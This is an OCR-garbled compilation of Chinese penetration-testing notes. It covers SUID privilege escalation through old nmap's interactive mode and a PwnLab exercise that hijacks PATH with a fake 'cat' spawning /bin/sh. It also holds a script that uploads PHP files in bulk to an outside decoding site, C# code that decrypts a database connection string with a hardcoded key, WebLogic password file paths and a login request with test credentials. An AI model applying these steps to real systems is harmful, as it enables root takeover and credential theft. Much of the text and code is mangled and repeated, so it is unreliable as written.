Jusr/bin/gpasswd 

Jusr/bin/sudo 

Jusr/local/bin/nmap 

Jusr/lib/openssh/ssh-keystgn 
Jusr/lib/eject/dncrypt-get-device 
Jusr/lib/vrware-tools/bin32/vmware-user-suid-wrapper 
Jusr/lib/vrware-tools/bin6é4/vmware-user-suid-wrapper 


Jusr/lib/pt_chown zu 
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截图 ， 我 们 发 现 nmap 居 然 有 SUID 标 志 位 ， 来 看 看 nmap 版 本 


daemon@linux:/$ /usr/local/bin/nmap --version 
Jusr/local/bin/nmap --version 


nmap version 3.81 ( http://www.insecure.org/nmap/ ) 
daemon@linux:/$ | ZE ( bobao.360.cn ) 





非常 老 的 nmap 版 本 ， 但 是 这 个 版 本 的 nmap 如 何 帮 有 我们 提 权 呢 ? 


nmap 支 持 “interactive.” 选 项 ， 用 户 能 够 通过 该 选项 执行 Shell 命 令 ， 通 常 ， 安 全 人 员 
会 使 用 该 命令 来 避免 他 们 使 用 nmap 命 令 被 记录 在 history 文 件 中 


daenon@linux:/$ /usr/local/bin/nmap --interactive 
Jusr/local/bin/nmap --interactive 


Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) 
Welcome to Interactive Mode -- press h <enter> for help 
nmap> h 
h 
Nmap Interactive Commands: 
n <nmap args> -- executes an nmap scan using the arguments given and 
waits for nmap to finish. Results are printed to the 
screen (of course you can still use file output commands). 
| <command> -- runs shell command given in the foreground 
x -= Exit Nmap 
f [--spoof <fakeargs>] [--nmap_path <path>] <nmap args> 
- Executes nmap in the background (results are NOT 

printed to the screen). You should generally specify a 
file for results (with -oX, -oG, or -oN). If you specify 
fakeargs with --spoof, Nmap will try to make those 
appear in ps listings. If you wish to execute a special 
version of Nmap, specify --nmap_path. 

- Obtain help with Nmap syntax 

- Prints this help screen. 


-v example.com/24 
--spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24 
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在 你 
的 渗透 过 程 ， 如 果 发 现 Nmap 3.48 有 SUID 位 ， 可 以 按照 本 文 的 例子 做 下 测试 。 
实验 3 : 利用 环境 变量 动 持 高 权限 程序 提 权 
PwnLad 是 笔者 最 喜欢 的 挑战 ， 一 个 攻击 者 有 几 个 账号 ， 但 是 都 不 是 root 权 限 。 


我 们 当前 登录 的 是 "Kane" 账 号 ， 当 前 没有 有 效 的 内 核 exploit， 也 没有 其 他 可 以 利用 
的 suid 文 件 


kane@pwnlab:~$ whoamt ; pwd 
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在 Kane 的 home 目 录 下 有 一 个 “msgmike.” 文 件 


ane@pwnlab:~$ find / -perm -u=s -type f 2>/dev/null 
-u=s -type f 2>/dev/null 


bin/umount 
sbin/mount.nfs 
home/kane/msgmike 
usr/bin/newgrp 


usr/bin/gpasswd 
usr/lib/eject/dmcrypt-get-device 
usr/lib/pt chown 
usr/lib/dbus-1.0/dbus-daemon-launch-helper 
usr/lib/openssh/ssh-keysign 


usr/sbin/exim4 ba, 
ane@pwnlab:~$ | ZE ( bobao.360.cn ) 


file 命 令 查 看 下 这 个 文件 


kane@pwnlab:~$ ls 


使 用 





Ke 
kane@pwntab:~$ file msgnike 
gnike 
etuid, setgid ELF 32-bit LSB executable, Intel 8038 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/LI 
-6.32, ButldID{sha1]=d7e0b2 1f33b2 134bd17467c3bb9be37deb88b365, not stripped 
on -$ 


canegpwnlab:-$ | 安全 客 ( bobao.360.cn ) 
从 截图 可 以 看 到 ， 这 是 一 个 ELF 32 位 LSB 执 行文 件 ， 但 是 当 我 们 执行 文件 的 时 候 ， 


报错 了 


kane@pwnlab:~$ ./msgmike 

. /msgmike 

cat: /home/mike/msg.txt: No such file or directory 
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报错 信息 我 们 可 以 看 到 msgmike 调 用 cat 命 令 读 取 /home/mike/msg.txt 文 件 。 


针对 这 种 情况 ， 我 们 可 以 通过 设置 bash 的 $path 环境 变量 来 利用 ， 通 常 的 $PATH 包 
kane@pwnlab:~$ echo $PATH 





echo SPATH 

/usr/local/bin: /usr/bin: /bin: /usr/local/games: [usr/games 
yu oneepwntab:-5 安全 客 ( bobao.360.cn ) 
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而 当 我 们 调用 cat 命 令 的 时 候 ，cat 会 从 以 上 目录 来 寻找 ， 如 果 我 们 添加 .到 $PATH 环 
境 变 量 ， 则 会 先 从 当前 目录 来 寻找 cat 指 令 


新 建 cat ,添加 执行 权限 


kane@pwnlab:~$ touch cat 
touch cat 
kane@pwnlab:~$ echo "/bin/sh" > cat 


echo "/bin/sh" > cat 
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这 样 
当 我 们 再 次 运行 ./msgmike 命 令 的 时 候 ， 就 会 触发 当前 目录 下 的 cat(/bin/sh)， 从 而 
提 权 。 完 整 的 exploit 如 下 


新 建 cat, 添 加 执行 权限 


kane@pwnlab:~$ touch cat 
touch cat 
kane@pwnlab:~$ echo "/bin/sh" > cat 


echo "/bin/sh" > cat 
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这 样 
当 我 们 再 次 运行 Jmsgmike 命 令 的 时 候 ， 就 会 触发 当前 目录 下 的 cat(/bin/sh)， 从 而 
提 权 。 完 整 的 exploit 如 下 


kane@pwnlab:~$ ./msgmike 
./msgmike 
: /home/mike/msg.txt: No such file or directory 


msgmike 
kane@pwnlab:~$ export PATH="." 
export PATH="." 
kanegpwnlab:-$ msgmike 
msgmike 
$ export PATH="/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games" 
export PATH="/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games" 
$ whoami; ls 
whoami; qls 


msgmike 
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解密 


现在 很 多 的 php 代 码 都 进行 了 各 种 各 样 的 加 蜜 造成 我 审计 的 时 候 很 趣 座 , 花 钱 去 解 
dt? 狐 似 有 点 不 值得 (关键 尼 玛 穷 呀 )。 于 是 琢磨 了 一 下 ,发 现 了 一 个 还 不 错 的 解密 站 
点 ， 写 一 个 批量 解密 感觉 棒 棒 以 


` 


#!/usr/bin/env python 
#-*- coding:utf-8 -*- 


import urllib2 
import urllib 
from sys import * 
import os.path 
import hashlib 
import time 
import json 
Const_Image_Format = [".php"] 
Glass FileFilt: 
fileList = [""] 
counter = 0 
def __init (self): 
pass 
def FindFile(self,dirr,filtrate = 1): 
global Const_Image_Format 
for s in os.listdir(dirr): 
newDir = os.path.join(dirr,s) 
if os.path.isfile(newDir): 
if filtrate: 
if newDir and(os.path.splitext(newDir) [1 
] in Const_Image_Format): 
self.fileList.append(newDir ) 
self.counter+=1 
else: 
self.fileList.append(newDir) 
self.counter+=1 


def upload(spath): 
dirr,filename=os.path.split(spath) 


m = hashlib.md5() 

m.update(filename) 

token = m.hexdigest() 

boundary = 'gL6GI3GI3GI3KM71Ij5GI3ae01Ij5KM7' 

data = [] 

data.append('------------ %S' 96 boundary) 
data.append('Content-Disposition: form-data; name="%s"\r 


\n' % 'Filename' ) 


data.append( '%s'%( filename) ) 
data.append('------------ %S' 96 boundary) 


data.append('Content-Disposition: form-data; name="%s"\r 


\n' % 'token') 


data.append('%s'%( token) ) 
data.append('------------ %s' 96 boundary) 


data.append('Content-Disposition: form-data; name="%s"\r 


\n'% 'timestamp' ) 


ata"; 


stream' ) 


data.append( '%d'%(time.time())); 
data.append('------------ %s' 96 boundary) 
fr=open(spath, 'rb') 

data.append('Content-Disposition: form-data; name="Filed 


filename="%s"' %(filename) ) 


data.append('Content-Type: %s\r\n' % 'application/octet- 


data.append(fr.read() ) 

fr.close() 

data.append('------------ %S\r\n' 96 boundary) 
data.append('Content-Disposition: form-data; name="%s"\r 


\n'% 'Upload') 


evel 


data.append('Submit Query'); 
data.append('------------ %S--\r\n' 96 boundary) 
http url-'http://dezend.qiling.org/decode/upload.html?aj 


http_body='\r\n'.join(data) 

#buld http request 

req-urllib2.Request(http url, data-http body) 

#header 

req.add header('Content-Type', 'multipart/form-data; bou 


ndary=---------- %S' % boundary) 


req.add header('User-Agent', 'Mozilla/5.0') 
#req.add_header('Referer', 'http://junxinsheng.com/upfile 
form.asp') 
#post data to server 
resp = urllib2.urlopen(req, timeout=5) 
#get response 
qrcont-resp.read() 
download(json.loads(qrcont)['result']['file'],dirr,filen 
ame) 
def download(Files, Dir, filename): 
url = 'http://dezend.qiling.org/decode/download.html?fil 
e=%s' % (Files) 
request- urllib2.Request (url) 
request.add_header('User-Agent', 'Mozilla/5.0 (Windows; U 
; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5. 
6 ) 
opener = urllib2.build opener() 
f=opener ,open(reduest ) 
data=f.read() 
with open(Dir+'/de.'+filename, "w+") as code: 
code.write(data) 
def main(): 
dirr-argv[1] 
File - FileFilt() 
File.FindFile(dirr - dirr) 
for filename in File.fileList: 
if filename: 
upload(filename) 
pass 
if _name__ == ' main ': 
main() 
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这 人 台 服 务 器 的 数据 库 连 接 字符 串 加 了 密 
«add key="conmdecrypt" value="101/1Vq/h/2VTErYbMgFMngt9nZIhyMMpv 
iYtT9StTawj kpKnv9fDGqf30pMxEK6H4VUOVj+GTY="_ /> 
我 于 是 下 载 了 他 们 的 WebService_yygh.,d11， 然 后 反 编 译 了 一 下 ， 找 到 这 个 
! [poc] (1.png) 
跟踪 getini(), 发 现 这 个 : 
![poc](2.png) 
再 跟踪 md5Decrypt 这 个 函数 发 现 这 个 : 
然后 我 在 
E:\kingstar\ConnConfig\ConnConfig.ini 
发 现 了 这 个 : 
101/1Vqg/h/OWLMwf uwM+ j Hw/ FHSrhQQoEr5tZ+tk10TX7qg171c6N6XAOptSPMUyQ 


3ywr2i4EJag- 
然后 我 自己 写 了 一 个 解密 的 程序 : 


using System; 


using System.Security.Cryptography; 


using System.Text; 


using System. IO; 


public class Test 


{ 


public static void Main() 


{ 
string text = null; 
byte[] buffer = Encoding.Default.GetBytes("winning"); 


byte[] array = Convert.FromBase64String("101/1Vq/h/OW1Mw 
fuwM+jHw/XFh5rhQQoEr5tZ+tk10TX7q171c6N6XAOptSPMUyQ3ywr2i4EJag=") : 


MD5CryptoServiceProvider mD5CryptoServiceProvider = new 
MD5CryptoServiceProvider(); 


byte[] key = mD5CryptoServiceProvider .ComputeHash(buf fer 
); 


TripleDESCryptoServiceProvider tripleDESCryptoServicePro 
vider = new TripleDESCryptoServiceProvider(); 


tripleDESCryptoServiceProvider.Key = key; 


tripleDESCryptoServiceProvider .Mode = CipherMode.ECB; 


text = Encoding.ASCII.GetString(tripleDESCryptoServicePr 
ovider.CreateDecryptor().TransformFinalBlock(array, 0, array.Len 


gth)); 


Console.WriteLine(text); 


FromBase64String 


FromBase64String 


http://www.wooyun.org/bugs/wooyun-2010-0161432 


PES 


ir 


我 于 是 下 载 了 他 们 的 WebService_yygh.dll， 然 后 反 编译 了 一 下 ， 


View Help 
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public bool connectdb() 


{ 


string encryptedString = this.getini(); 
this.cn.ConnectionString = this.mdSDecrypt(encryptedString, 
if (this.cn.ConnectionString == "") 

throw new Éxception("conn null”); 


) 
bool result; 
try 


this.cn.Open(); 
catch (Exception var 1 58) 


result = false; 
return result; 


result = true; 
return result; 


找到 


“winning™); 


` 


这 


个 


202 


FromBase64String 


JR 


#getini(), RIL À : 


lle View Help 


t 
t 


veeó*56ó0óóóóüóólüóéüüeeeeeceoee 


B & c -|4 
} System.Security.Permissions 

} System.Security.Policy 

} System.Security.Principal 

} System. Security. Util 

) System.StubHelpers 

1 System.Text 

) System.Threading 

} System.Threading.Tasks 


System (4.0.0.0) 

System.Core (4.0.0.0) 

System.Xml (4.0.0.0) 

System.Xaml (4.0.0.0) 
WindowsBase (4.0.0.0) 
PresentationCore (4.0.0.0) 
PresentationFramework (4.0.0.0) 
ICSharpCode.TreeView (4.2.0.8752) 
Mono.Cecil (0.9.5.0) 
ICSharpCode.AvalonEdit (5.0.1.0) 
ICSharpCode.Decompiler (2.3.1.1855) 
ILSpy (23.1.1855) 
EpointBigFileUpLoad (1.0.0.0) 
RegentLibDB 

WebService yygh (1.0.0.0) 

Æ References 


Ps 
} HisInterface 





a publicmk 





$ J Base Types 
3. Derived Types 
* cn: SqiConnection 
© ctor) : void 
© connectdb{) : bool 


€ getbyte(string) : bytel] 
LEE 


© mdSDecryptístring, string) : string 


3 () TransCode 
3 #4 checkedata 


à 


(ding 


& Z Base Tvpes 


PBI HisInterface.publicmk 
public string getini() 


{ 


string path = “e:\\kingstar\\ConnConfig\\ConnConfig. ini"; 


string result; 
if (File.Exists(path)) 
{ 


StreamReader streamReader = File.OpenText(path); 
result = streamReader.ReadLine(); 


} 


else 


{ 
result = string.Empty; 


return result; 


跟踪 md5Decrypt 这 个 函数 发 现 这 个 : 
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本 二 


然后 我 在 E:\kingstan\ConnConfig\ConnConfig.ini 发 现 了 这 个 : 


public string mdSDecrypt(string encryptedString, string strkey) 


{ 


string result; 
if (encryptedString.Trim() == "") 
{ 
result = *"; 
} 
else 
{ 
string text = null; 
byte[] buffer = this.getbyte(strkey); 
try 
{ 


byte[] array = Convert.FromBase64String(encryptedString); 
MDSCryptoServiceProvider sDSCryptoServiceProvider = new MDSCryptoServiceProvider(); 
byte[] key = mDSCryptoServiceProvider .ComputeHash( buffer) ; 


TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider(); 


tripleDESCryptoServiceProvider.Key = key; 
tripleDESCryptoServiceProvider.Mode = CipherMode.ECB; 


text = Encoding.ASCII.GetString(tripleDESCryptoServiceProvider.CreateDecryptor().TransformFinalBlock(array, 


catch (Exception ex) 


string message = ex.Message; 
throw; 


result = text; 


) 


return result; 


101/1Vq/h/OWIMwfuwM-jHw/Fh5rhQQoEr5tZ-*tk1OTX7q171c6N6XAOptSPMUyQ 
3ywr2idEJag- 然后 我 自己 写 了 一 个 解密 的 程序 : 


using System; 


using System.Security.Cryptography; 


using System.Text; 
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using System. IO; 


public class Test 


{ 


public static void Main() 


{ 


string text = null; 


byte[] buffer = Encoding.Default.GetBytes("winning"); 


byte[] array = Convert.FromBase64String("101/1Vq/h/OW1Mw 
fuwM+jHw/Fh5rhQQoEr5tz+tk10TX7q171C6N6XAOptSPMUyQ3ywr2i4EJag=" ); 


MD5CryptoServiceProvider mD5CryptoServiceProvider = new 
MD5CryptoServiceProvider(); 


byte[] key = mD5CryptoServiceProvider .ComputeHash(buf fer 
); 


TripleDESCryptoServiceProvider tripleDESCryptoServicePro 
vider - new TripleDESCryptoServiceProvider(); 


tripleDESCryptoServiceProvider.Key - key; 


tripleDESCryptoServiceProvider.Mode - CipherMode.ECB; 


text - Encoding.ASCII.GetString(tripleDESCryptoServicePr 
ovider.CreateDecryptor().TransformFinalBlock(array, 0, array.Len 


gth)); 


Console.WriteLine(text); 


解密 JBoss 和 Weblogic 数 据 源 连接 字符 串 和 控制 台 


密码 


http://drops.wooyun.org/tips/349 http://zone.wooyun.org/content/22885 
http://bobao.360.cn/learning/detail/337.html 3 48 3& 

径 : [home/web/jsp/bea/user_projects/domains/DOMAIN_NAME/security/Serialize 
dSystemlni.dat 密码 文件 路 

径 : [home/web/jsp/bea/user_projects/domains/DOMAIN_NAME/servers/APP_NA 
ME/security/boot.properties 


自动 检测 解密 脚本 


#!/usr/bin/env python 
#-*- coding:utf-8 -*- 


import urllib2 
import urllib 
from sys import * 
import os.path 
import hashlib 
import time 
import json 
Const_Image_Format = [".php"] 
class FileFilt: 
fileList = [""] 
counter - 0 
def — init (self): 
pass 
def FindFile(self,dirr,filtrate - 1): 
global Const Image Format 
for s in os.listdir(dirr): 
newDir - os.path.join(dirr,s) 
if os.path.isfile(newDir ): 
if filtrate: 
if newDir and(os.path.splitext(newDir)[1 
] in Const Image Format): 
self.fileList.append(newDir) 
self.counter+=1 
else: 
self.fileList.append(newDir) 
self.counter+=1 


def upload(spath): 
dirr, filename=os.path.split(spath) 
m = hashlib.md5() 
m.update(filename) 
token = m.hexdigest() 
boundary = 'gL6GI3GI3GI3KM71j5GI3ae01j5KM7' 


data = [] 

data.append('------------ %S' 96 boundary) 

data.append('Content-Disposition: form-data; name="%s"\r 
\n' 96 'Filename' ) 

data.append( '%s'%( filename) ) 

data.append('------------ %s' % boundary) 


data.append('Content-Disposition: form-data; name="%s"\r 
\n' 96 'token') 

data.append('%s'%(token)) 

data.append('------------ %S' 96 boundary) 


data.append('Content-Disposition: form-data; name="%s"\r 
\n'% 'timestamp' ) 

data.append( '%d'%(time.time())); 

data.append('------------ %s' 96 boundary) 

fr=open(spath, 'rb') 

data.append('Content-Disposition: form-data; name="Filed 
ata"; filename="%s"' %(filename) ) 

data.append('Content-Type: %s\r\n' 96 'application/octet- 
stream' ) 

data.append(fr.read() ) 

fr.close() 

data.append('------------ %S\r\n' 96 boundary) 

data.append('Content-Disposition: form-data; name="%s"\r 
\n'% 'Upload' ) 

data.append('Submit Query'); 

data.append('------------ %S--\r\n' 96 boundary) 

http url-'http://dezend.qiling.org/decode/upload.html?aj 
ax-1' 

http_body='\r\n'.join(data) 

#buld http request 

req-urllib2.Request(http url, data-http body) 

#header 

req.add header('Content-Type', 'multipart/form-data; bou 
ndaryz---------- %s' % boundary) 

req.add header('User-Agent', 'Mozilla/5.0') 

Zreq.add header('Referer', 'http://junxinsheng.com/upfile 
form.asp') 

#post data to server 


resp = urllib2.urlopen(reg, timeout=5) 

#get response 

qrcont-resp.read() 

download(json.loads(qrcont)['result']['file'],dirr,filen 
ame) 
def download(Files,Dir,filename): 

url - 'http://dezend.qiling.org/decode/download.html?fil 
e=%S' % (Files) 

request- urllib2.Request (url) 

request .add_header('User-Agent', 'Mozilla/5.0 (Windows; U 
; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5. 
6') 

opener = urllib2.build opener() 

f=opener .open(request ) 

data=f.read() 

with open(Dir+'/de.'+filename, "w+") as code: 

code.write(data) 

def main(): 

dirr=argv[1] 

File = FileFilt() 

File.FindFile(dirr = dirr) 

for filename in File.fileList: 

if filename: 
upload( filename) 
pass 

if _name__ == ' main ': 

main() 
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X 71 # cookies 


: [http://10. 226. 1. 120: 108/kass/tempfile/PersonalPicture/12|023 


<POSTohttp: //10. 226. 1. 120: 108/kass/basic/login/action check. js 
<DATASTx_KassUserName=emtest&Tx_KassPassword=emtest</DATA> 






<POST>http://10.226.1.120:108/kass/basic/login/action_check.jsp< 
/POST> 
<DATA>Tx_KassUserName=emtest&Tx_KassPassword=emtest</DATA> 


